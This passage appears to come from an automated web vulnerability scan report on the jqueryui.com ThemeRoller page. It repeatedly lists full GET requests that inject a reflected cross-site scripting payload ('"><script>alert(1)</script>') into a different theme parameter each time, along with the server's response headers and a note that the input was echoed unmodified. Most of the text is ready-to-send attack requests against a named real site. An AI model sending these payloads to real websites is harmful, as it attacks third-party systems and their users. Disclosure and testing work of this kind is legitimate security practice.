ight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5653"><script>alert(1)</script>a61da8af9c5 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngb5653"><script>alert(1)</script>a61da8af9c5&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d42"><script>alert(1)</script>5be9fe66018 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.pnga7d42"><script>alert(1)</script>5be9fe66018&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e2d"><script>alert(1)</script>60dbb8bd3af was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pnge0e2d"><script>alert(1)</script>60dbb8bd3af&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea49"><script>alert(1)</script>bb88e881afa was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png3ea49"><script>alert(1)</script>bb88e881afa&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad9e"><script>alert(1)</script>111ada64c2c was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCCfad9e"><script>alert(1)</script>111ada64c2c&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bc0"><script>alert(1)</script>e24a25cb4c9 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC39bc0"><script>alert(1)</script>e24a25cb4c9&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef13"><script>alert(1)</script>dcecacde3c4 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF3ef13"><script>alert(1)</script>dcecacde3c4&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46a8"><script>alert(1)</script>1f7af90ed7f was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000c46a8"><script>alert(1)</script>1f7af90ed7f&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f4a"><script>alert(1)</script>475d9e92991 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD42f4a"><script>alert(1)</script>475d9e92991&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8752b"><script>alert(1)</script>e220339ee07 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9368752b"><script>alert(1)</script>e220339ee07&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cb2"><script>alert(1)</script>0fa604b9a9c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF37cb2"><script>alert(1)</script>0fa604b9a9c&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e14f"><script>alert(1)</script>04d20544562 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px4e14f"><script>alert(1)</script>04d20544562&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d33e"><script>alert(1)</script>d4448f15dc2 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
